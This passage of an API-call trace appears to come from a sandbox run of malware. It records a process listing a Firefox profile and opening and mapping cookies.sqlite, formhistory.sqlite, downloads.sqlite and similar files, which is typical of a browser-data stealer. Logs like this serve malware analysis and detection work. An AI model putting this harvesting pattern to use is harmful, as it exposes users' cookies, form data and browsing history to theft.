lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\cookies.sqlite", lpDst=0x56c300, nSize=0x5b | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\cookies.sqlite") returned 0x5b [0589.670] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\cookies.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\cookies.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0589.670] CloseHandle (hObject=0x5ac) returned 1 [0589.670] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\cookies.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\cookies.sqlite"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0589.670] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x80000 [0589.670] CreateFileMappingW (hFile=0x5ac, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x4c8 [0589.670] MapViewOfFile (hFileMappingObject=0x4c8, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x3800000 [0589.673] UnmapViewOfFile (lpBaseAddress=0x3800000) returned 1 [0589.676] CloseHandle (hObject=0x4c8) returned 1 [0589.676] CloseHandle (hObject=0x5ac) returned 1 [0589.676] LocalFree (hMem=0x56c300) returned 0x0 [0589.676] LocalFree (hMem=0x56afc8) returned 0x0 [0589.676] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52dffc | out: lpFindFileData=0x52dffc) returned 1 [0589.676] lstrlenW (lpString="\\") returned 1 [0589.676] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0589.676] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x59a8a0 [0589.676] lstrlenW (lpString="downloads.sqlite") returned 16 [0589.676] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0589.676] LocalAlloc (uFlags=0x40, uBytes=0x13a) returned 0x56afc8 [0589.676] LocalFree (hMem=0x59a8a0) returned 0x0 [0589.676] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\downloads.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\downloads.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0589.676] CloseHandle (hObject=0x5ac) returned 1 [0589.676] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\downloads.sqlite", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5d [0589.676] LocalAlloc (uFlags=0x40, uBytes=0x13a) returned 0x56c300 [0589.676] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\downloads.sqlite", lpDst=0x56c300, nSize=0x5d | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\downloads.sqlite") returned 0x5d [0589.676] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\downloads.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\downloads.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0589.676] CloseHandle (hObject=0x5ac) returned 1 [0589.676] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\downloads.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\downloads.sqlite"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0589.676] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x18000 [0589.676] CreateFileMappingW (hFile=0x5ac, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x4c8 [0589.676] MapViewOfFile (hFileMappingObject=0x4c8, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0589.677] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0589.678] CloseHandle (hObject=0x4c8) returned 1 [0589.678] CloseHandle (hObject=0x5ac) returned 1 [0589.678] LocalFree (hMem=0x56c300) returned 0x0 [0589.678] LocalFree (hMem=0x56afc8) returned 0x0 [0589.678] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52dffc | out: lpFindFileData=0x52dffc) returned 1 [0589.678] lstrlenW (lpString="\\") returned 1 [0589.678] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0589.678] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x59a8a0 [0589.678] lstrlenW (lpString="extensions.ini") returned 14 [0589.678] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0589.678] LocalAlloc (uFlags=0x40, uBytes=0x136) returned 0x56afc8 [0589.678] LocalFree (hMem=0x59a8a0) returned 0x0 [0589.678] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\extensions.ini" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\extensions.ini"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0589.678] CloseHandle (hObject=0x5ac) returned 1 [0589.678] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\extensions.ini", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5b [0589.678] LocalAlloc (uFlags=0x40, uBytes=0x136) returned 0x56c300 [0589.678] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\extensions.ini", lpDst=0x56c300, nSize=0x5b | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\extensions.ini") returned 0x5b [0589.678] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\extensions.ini" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\extensions.ini"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0589.678] CloseHandle (hObject=0x5ac) returned 1 [0589.678] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\extensions.ini" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\extensions.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0589.678] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x8d [0589.678] CreateFileMappingW (hFile=0x5ac, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x4c8 [0589.678] MapViewOfFile (hFileMappingObject=0x4c8, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0589.678] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0589.679] CloseHandle (hObject=0x4c8) returned 1 [0589.679] CloseHandle (hObject=0x5ac) returned 1 [0589.679] LocalFree (hMem=0x56c300) returned 0x0 [0589.679] LocalFree (hMem=0x56afc8) returned 0x0 [0589.679] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52dffc | out: lpFindFileData=0x52dffc) returned 1 [0589.679] lstrlenW (lpString="\\") returned 1 [0589.679] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0589.679] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x59a8a0 [0589.679] lstrlenW (lpString="extensions.sqlite") returned 17 [0589.679] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0589.679] LocalAlloc (uFlags=0x40, uBytes=0x13c) returned 0x56afc8 [0589.679] LocalFree (hMem=0x59a8a0) returned 0x0 [0589.679] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\extensions.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\extensions.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0589.679] CloseHandle (hObject=0x5ac) returned 1 [0589.679] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\extensions.sqlite", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5e [0589.679] LocalAlloc (uFlags=0x40, uBytes=0x13c) returned 0x56c300 [0589.679] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\extensions.sqlite", lpDst=0x56c300, nSize=0x5e | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\extensions.sqlite") returned 0x5e [0589.679] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\extensions.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\extensions.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0589.679] CloseHandle (hObject=0x5ac) returned 1 [0589.679] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\extensions.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\extensions.sqlite"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0589.679] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x70000 [0589.679] CreateFileMappingW (hFile=0x5ac, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x4c8 [0589.679] MapViewOfFile (hFileMappingObject=0x4c8, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x3680000 [0589.681] UnmapViewOfFile (lpBaseAddress=0x3680000) returned 1 [0589.684] CloseHandle (hObject=0x4c8) returned 1 [0589.684] CloseHandle (hObject=0x5ac) returned 1 [0589.684] LocalFree (hMem=0x56c300) returned 0x0 [0589.684] LocalFree (hMem=0x56afc8) returned 0x0 [0589.684] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52dffc | out: lpFindFileData=0x52dffc) returned 1 [0589.684] lstrlenW (lpString="\\") returned 1 [0589.684] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0589.684] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x59a8a0 [0589.684] lstrlenW (lpString="formhistory.sqlite") returned 18 [0589.684] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0589.684] LocalAlloc (uFlags=0x40, uBytes=0x13e) returned 0x56afc8 [0589.684] LocalFree (hMem=0x59a8a0) returned 0x0 [0589.684] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\formhistory.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\formhistory.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0589.684] CloseHandle (hObject=0x5ac) returned 1 [0589.684] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\formhistory.sqlite", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5f [0589.684] LocalAlloc (uFlags=0x40, uBytes=0x13e) returned 0x56c300 [0589.684] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\formhistory.sqlite", lpDst=0x56c300, nSize=0x5f | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\formhistory.sqlite") returned 0x5f [0589.684] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\formhistory.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\formhistory.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0589.684] CloseHandle (hObject=0x5ac) returned 1 [0589.684] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\formhistory.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\formhistory.sqlite"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0589.685] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x30000 [0589.685] CreateFileMappingW (hFile=0x5ac, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x4c8 [0589.685] MapViewOfFile (hFileMappingObject=0x4c8, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0589.686] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0589.687] CloseHandle (hObject=0x4c8) returned 1 [0589.687] CloseHandle (hObject=0x5ac) returned 1 [0589.687] LocalFree (hMem=0x56c300) returned 0x0 [0589.687] LocalFree (hMem=0x56afc8) returned 0x0 [0589.687] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52dffc | out: lpFindFileData=0x52dffc) returned 1 [0589.687] lstrcmpiW (lpString1="healthreport", lpString2=".") returned 1 [0589.687] lstrcmpiW (lpString1="healthreport", lpString2="..") returned 1 [0589.687] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0589.687] lstrlenW (lpString="\\") returned 1 [0589.687] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0589.687] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x59a8a0 [0589.687] lstrlenW (lpString="healthreport") returned 12 [0589.687] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0589.687] LocalAlloc (uFlags=0x40, uBytes=0x132) returned 0x56afc8 [0589.687] LocalFree (hMem=0x59a8a0) returned 0x0 [0589.687] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\healthreport") returned 88 [0589.687] lstrlenW (lpString="\\*.*") returned 4 [0589.687] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\healthreport") returned 88 [0589.687] LocalAlloc (uFlags=0x40, uBytes=0x13a) returned 0x56c300 [0589.687] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\healthreport\\*.*", lpFindFileData=0x52dd84 | out: lpFindFileData=0x52dd84) returned 0x57ca60 [0589.688] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0589.688] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52dd84 | out: lpFindFileData=0x52dd84) returned 1 [0589.688] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0589.688] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0589.688] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52dd84 | out: lpFindFileData=0x52dd84) returned 0 [0589.688] FindClose (in: hFindFile=0x57ca60 | out: hFindFile=0x57ca60) returned 1 [0589.688] LocalFree (hMem=0x56c300) returned 0x0 [0589.688] LocalFree (hMem=0x56afc8) returned 0x0 [0589.688] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52dffc | out: lpFindFileData=0x52dffc) returned 1 [0589.688] lstrlenW (lpString="\\") returned 1 [0589.688] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0589.688] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x59a8a0 [0589.688] lstrlenW (lpString="healthreport.sqlite") returned 19 [0589.688] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0589.688] LocalAlloc (uFlags=0x40, uBytes=0x140) returned 0x56afc8 [0589.688] LocalFree (hMem=0x59a8a0) returned 0x0 [0589.688] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\healthreport.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\healthreport.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0589.688] CloseHandle (hObject=0x5ac) returned 1 [0589.688] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\healthreport.sqlite", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x60 [0589.688] LocalAlloc (uFlags=0x40, uBytes=0x140) returned 0x56c300 [0589.688] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\healthreport.sqlite", lpDst=0x56c300, nSize=0x60 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\healthreport.sqlite") returned 0x60 [0589.688] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\healthreport.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\healthreport.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0589.688] CloseHandle (hObject=0x5ac) returned 1 [0589.688] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\healthreport.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\healthreport.sqlite"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0589.688] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x118000 [0589.688] CreateFileMappingW (hFile=0x5ac, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x4c8 [0589.688] MapViewOfFile (hFileMappingObject=0x4c8, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x3800000 [0589.693] UnmapViewOfFile (lpBaseAddress=0x3800000) returned 1 [0589.699] CloseHandle (hObject=0x4c8) returned 1 [0589.699] CloseHandle (hObject=0x5ac) returned 1 [0589.699] LocalFree (hMem=0x56c300) returned 0x0 [0589.699] LocalFree (hMem=0x56afc8) returned 0x0 [0589.699] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52dffc | out: lpFindFileData=0x52dffc) returned 1 [0589.699] lstrcmpiW (lpString1="indexedDB", lpString2=".") returned 1 [0589.699] lstrcmpiW (lpString1="indexedDB", lpString2="..") returned 1 [0589.699] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0589.699] lstrlenW (lpString="\\") returned 1 [0589.699] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0589.699] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x59a8a0 [0589.699] lstrlenW (lpString="indexedDB") returned 9 [0589.699] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0589.699] LocalAlloc (uFlags=0x40, uBytes=0x12c) returned 0x578b10 [0589.699] LocalFree (hMem=0x59a8a0) returned 0x0 [0589.699] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB") returned 85 [0589.699] lstrlenW (lpString="\\*.*") returned 4 [0589.699] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB") returned 85 [0589.699] LocalAlloc (uFlags=0x40, uBytes=0x134) returned 0x56afc8 [0589.699] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\*.*", lpFindFileData=0x52dd84 | out: lpFindFileData=0x52dd84) returned 0x57ca60 [0589.699] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0589.699] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52dd84 | out: lpFindFileData=0x52dd84) returned 1 [0589.699] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0589.699] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0589.699] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52dd84 | out: lpFindFileData=0x52dd84) returned 1 [0589.699] lstrcmpiW (lpString1="moz-safe-about+home", lpString2=".") returned 1 [0589.699] lstrcmpiW (lpString1="moz-safe-about+home", lpString2="..") returned 1 [0589.699] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB") returned 85 [0589.699] lstrlenW (lpString="\\") returned 1 [0589.699] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB") returned 85 [0589.699] LocalAlloc (uFlags=0x40, uBytes=0x12e) returned 0x59a8a0 [0589.699] lstrlenW (lpString="moz-safe-about+home") returned 19 [0589.699] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\") returned 86 [0589.699] LocalAlloc (uFlags=0x40, uBytes=0x154) returned 0x578c48 [0589.700] LocalFree (hMem=0x59a8a0) returned 0x0 [0589.700] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home") returned 105 [0589.700] lstrlenW (lpString="\\*.*") returned 4 [0589.700] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home") returned 105 [0589.700] LocalAlloc (uFlags=0x40, uBytes=0x15c) returned 0x59a8a0 [0589.700] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\*.*", lpFindFileData=0x52db0c | out: lpFindFileData=0x52db0c) returned 0x57c9a0 [0589.700] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0589.700] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db0c | out: lpFindFileData=0x52db0c) returned 1 [0589.700] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0589.700] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0589.700] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db0c | out: lpFindFileData=0x52db0c) returned 1 [0589.700] lstrlenW (lpString="\\") returned 1 [0589.700] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home") returned 105 [0589.700] LocalAlloc (uFlags=0x40, uBytes=0x156) returned 0x5e1d10 [0589.700] lstrlenW (lpString=".metadata") returned 9 [0589.700] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\") returned 106 [0589.700] LocalAlloc (uFlags=0x40, uBytes=0x168) returned 0x5e1e70 [0589.700] LocalFree (hMem=0x5e1d10) returned 0x0 